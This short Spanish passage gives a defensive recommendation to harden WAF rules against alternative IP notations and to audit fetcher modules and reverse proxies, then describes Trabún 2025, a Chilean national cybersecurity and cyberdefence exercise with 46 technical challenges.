Actualizar y fortalecer las reglas de los WAF (Web Application Firewall) para detectar y bloquear notaciones alternativas de IP (como hexadecimal) y realizar auditorías periódicas en módulos 'fetcher' o proxies inversos para identificar posibles puntos ciegos o configuraciones inseguras.

Ejercicio nacional de competencias técnicas en ciberseguridad y ciberdefensa, desarrollado por EMCO, ENTEL y Q-Mission en colaboración con instituciones de defensa y seguridad de Chile. Trabún 2025 evaluó capacidades operativas de equipos CSIRT, fuerzas armadas y agencias de seguridad mediante 46 desafíos técnicos distribuidos en dos días intensivos de operaciones.